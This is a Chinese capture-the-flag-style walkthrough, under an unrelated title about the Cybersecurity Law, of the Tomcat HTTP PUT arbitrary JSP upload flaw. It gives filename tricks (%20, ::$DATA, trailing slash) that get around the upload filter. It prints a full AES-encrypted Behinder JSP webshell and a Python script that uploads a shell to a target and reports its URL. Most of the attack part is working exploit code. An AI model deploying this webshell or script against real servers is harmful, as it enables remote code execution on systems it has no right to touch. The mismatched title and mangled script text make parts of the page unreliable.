中华人民共和国网络安全法(出版物)_360百科
目录
漏洞成因
复现过程
方法一 手动上传
方法二 (只需python 环境 不需要其他工具)
漏洞成因 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响范围:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响范围:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
这里还有一个细节
其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。
Windows下不允许文件以空格结尾
以PUT /x.jsp%20 HTTP/1.1上传到windows会被自动去掉末尾空格
WindowsNTFS流
PUT /x.jsp::$DATA HTTP/1.1
/在文件名中是非法的,也会被去除(Linux/Windows)
PUT /x.jsp/ HTTP/1.1
本次使用的是第三种方法绕过
复现过程
靶场地址
Apache Tomcat/8.5.19
方法一 手动上传
在首页刷新 抓包 改为如下形式
发包后返回201 这时直接访问 木马存在(直接在网站根目录 xxxx/1.jsp)
自带马 密码为默认rebeyond
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.base64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
连接
终端 输入查找语句
find -name *flag*
方法二 (只需python 环境 不需要其他工具) 其实漏洞利用的原理都一样,这个适合那些没有工具的哥们,比如有的蚁剑没有连接jsp马的选项。。。。 如果要下冰蝎的话,只能连接它的自带马。
其实漏洞利用的原理都一样,这个适合那些没有工具的哥们,比如有的蚁剑没有连接jsp马的选项。。。。 如果要下冰蝎的话,只能连接它的自带马。
python 脚本
conn = httplib.HTTPConnection(sys.argv[1]) conn.request(method='OPTIONS', url='/ffffzz') headers = dict(conn.getresponse().getheaders()) if 'allow' in headers and headers['allow'].find('PUT') > 0 : conn.close() conn = httplib.HTTPConnection(sys.argv[1]) url = "/" + str(int(time.time()))+'.jsp/' #url = "/" + str(int(time.time()))+'.jsp::$DATA' conn.request( method='PUT', url= url, body=body) res = conn.getresponse() if res.status == 201 : #print 'shell:', 'http://' + sys.argv[1] + url[:-7] print 'shell:', 'http://' + sys.argv[1] + url[:-1] elif res.status == 204 : print 'file exists' else: print 'error' conn.close() else: print 'Server not vulnerable'except Exception,e: print 'Error:', e"~/桌面/tomcat.py" 33L, 1603B 33,21 底端
慢慢传参命令执行
参考链接
https://blog.csdn.net/qq115399231/article/details/97371795
https://blog.csdn.net/weixin_40412037/article/details/10625557
https://zhishihezi.net/c/c7ecf406d93ed094559f1cd654950609
Tomcat任意文件写入漏洞 - Xor0ne - 博客园
作者水平有限,有任何不当之处欢迎指正。
本文目的是为了传播web安全原理知识,提高相关人员的安全意识,任何利用本文提到的技术与工具造成的违法行为,后果自负!